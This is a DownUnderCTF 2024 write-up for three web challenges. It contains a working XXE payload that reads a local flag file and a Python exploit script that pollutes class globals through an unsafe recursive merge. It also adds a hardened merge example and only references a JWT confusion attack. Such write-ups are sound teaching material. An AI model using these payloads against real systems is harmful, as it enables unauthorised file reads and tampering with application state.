DownUnderCTF 2024
Information
Team: DeadSec
Write up
web/zoo feedback form
Desc
Simple XXE injection problem.
Inject the exploit (XML).
Exploit
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///app/flag.txt">
]>
<root>
<feedback>&xxe;</feedback>
</root>
web/co2
Desc
Python class pollution through an improper merge function (similar to prototype pollution).
# Vulnerable function
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
Exploit
import requests
url = "https://web-co2-b55776733224c2b7.2024.ductf.dev"
s = requests.session()
payload = {"title": "asdf","content": "asdf", "rating": 4, "referred": "asdf",'__class__':{'__init__':{'__globals__':{'flag':'true'}}}}
# login
s.post(f"{url}/login", data={"username": "whguswo", "password": "whguswo"})
# exploit
res = s.post(f"{url}/save_feedback", json=payload)
print(res.text)
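The merge above next to a hardened form, as an added example that is not the challenge's code or part of the original write-up. Feedback, flag, ALLOWED_FIELDS, safe_merge and current_flag are hypothetical names, and vulnerable_merge is the write-up's merge() under another name.

```python
# Added example, not the challenge source. Feedback, flag, ALLOWED_FIELDS,
# safe_merge and current_flag are hypothetical; PAYLOAD mirrors the write-up's.
flag = "false"  # stands in for the module-level value the payload targets
ALLOWED_FIELDS = {"title", "content", "rating", "referred"}
PAYLOAD = {"title": "asdf", "content": "asdf", "rating": 4, "referred": "asdf",
           "__class__": {"__init__": {"__globals__": {"flag": "true"}}}}

class Feedback:
    def __init__(self):
        self.title = self.content = self.referred = ""
        self.rating = 0

def current_flag():
    return flag  # read at call time, so it reflects any pollution

def vulnerable_merge(src, dst):
    # The write-up's merge(): every key is trusted as an attribute name, so
    # __class__ -> __init__ -> __globals__ walks from the instance to globals.
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                vulnerable_merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            vulnerable_merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

def safe_merge(src, dst):
    # Hardened form: allow-listed keys only, scalar values only, no recursion.
    if not isinstance(src, dict):
        raise TypeError("feedback must be a JSON object")
    for k, v in src.items():
        if k not in ALLOWED_FIELDS:
            raise ValueError(f"unexpected field: {k!r}")
        if isinstance(v, (dict, list)):
            raise ValueError(f"field {k!r} must be a scalar")
    for k, v in src.items():  # apply only after the whole object validated
        setattr(dst, k, v)
    return dst

if __name__ == "__main__":
    try:
        safe_merge(PAYLOAD, Feedback())
    except ValueError as e:
        print("rejected:", e, "| flag =", current_flag())
    vulnerable_merge(PAYLOAD, Feedback())
    print("after vulnerable merge: flag =", current_flag())
```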
web/i am confusion
Desc
JWT confusion attack, then re-sign your JWT.
PortSwigger - JWT Confusion
Exploit
Solve with JWT Confusion
Comment
It’s been a while since I had time for CTF and I enjoyed it.
This post is licensed under CC BY 4.0 by the author.